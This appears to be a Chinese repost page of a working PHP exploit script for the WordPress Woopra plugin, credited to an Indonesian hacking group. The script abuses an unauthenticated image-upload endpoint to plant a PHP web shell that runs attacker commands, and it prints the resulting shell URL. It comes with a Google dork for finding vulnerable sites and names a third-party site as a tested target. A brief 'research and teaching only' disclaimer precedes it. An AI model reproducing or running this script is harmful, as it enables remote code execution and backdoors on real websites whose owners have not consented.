zoukankan      html  css  js  c++  java

  • WordPress Woopra plugin remote PHP arbitrary code execution exploit.

    测试方法:

    提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

    1. # Exploit Title: woopra plugins execute arbitrary PHP code Exploit
    2. # Google Dork: inurl:/plugins/woopra/inc/php-ofc-library , inurl:wp-content/plugins/woopra/inc/
    3. # Date: [06-10-2013]
    4. # Exploit Author: wantexz
    5. # Vendor Homepage:wordpress.org/plugins/woopra/
    6. # Software Link: wordpress.org/plugins/woopra
    7. # Version: woopra
    8. # Tested on: [wantexz]
    9. # CVE :
    10. # target tested: http://zainhd.com/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php
    11.  
    12.  
    13. ############################################################################################
    14. # INDONESIANCODER
    15. # by
    16. # WANTEXZ
    17. #
    18. ############################################################################################
    19.  
    20.  
    21. <?php
    22.  
    23. # woopra plugins ~ Exploit
    24. # http://indonesiancoder.com/
    25. #
    26.  
    27. echo <<<EOT
    28.  
    29. # -----------------------------------
    30. #/ woopra ~ Exploit
    31. # Author: wantexz /
    32. # -----------------------------------
    33.  
    34. ################################################################################################
    35. # Author: WANTEXZ
    36. #
    37. # thank to : tukulesto,arianom,cimpli,jack_jahat,k4L0NG666,Br3NG0S,Xr0b0t,blie,KaMtiEz,Mboys
    38. # all indonesian coder, indonesian defacer, kill-9
    39. ,jatimcom , malangcyber
    40. #
    41. ################################################################################################
    42.  
    43. EOT;
    44.  
    45.  
    46. $options = getopt('u:f:');
    47.  
    48. if(!isset($options['u'], $options['f']))
    49. die(" Usage example: php IDC.php -u http://target.com/ -f shell.php
    50. -u http://target.com/ The full path to Joomla!
    51. -f shell.php The name of the file to create. ");
    52.  
    53. $url = $options['u'];
    54. $file = $options['f'];
    55.  
    56.  
    57. $shell ="{$url}//wp-content/plugins/woopra/inc/tmp-upload-images/{$file}";
    58. $url ="{$url}/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name={$file}";
    59.  
    60. $data ="<?php eval($_GET['cmd']); ?>";
    61. $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64;
    62. rv:15.0) Gecko/20100101 Firefox/15.0.1',
    63. 'Content-Type: text/plain');
    64.  
    65.  
    66. echo " [+] Submitting request to: {$options['u']} ";
    67.  
    68.  
    69. $handle = curl_init();
    70.  
    71. curl_setopt($handle, CURLOPT_URL, $url);
    72. curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
    73. curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
    74. curl_setopt($handle, CURLOPT_RETURNTRANSFER,true);
    75.  
    76. $source = curl_exec($handle);
    77. curl_close($handle);
    78.  
    79.  
    80. if(!strpos($source,'Undefined variable: HTTP_RAW_POST_DATA')&&
    81. @fopen($shell,'r'))
    82. {
    83. echo " [+] Exploit completed successfully! ";
    84. echo " ______________________________________________
    85. {$shell}?cmd=system('id'); ";
    86. }
    87. else
    88. {
    89. die(" [+] Exploit was unsuccessful. ");
    90. }
    91.  
    92. ?>
  • 相关阅读:
    React Native基础&入门教程:以一个To Do List小例子,看props和state
    Xamarin 学习笔记
    网站HTTP升级HTTPS完全配置手册
    Xamarin 学习笔记
    Xamarin 学习笔记
    React Native基础&入门教程:初步使用Flexbox布局
    SpreadJS使用进阶指南
    用WijmoJS搭建您的前端Web应用 —— React
    【图解】FlexGrid Explorer 全功能问世
    只用最适合的!全面对比主流 .NET 报表控件
  • 原文地址:https://www.cnblogs.com/security4399/p/3359933.html
Copyright © 2011-2022 走看看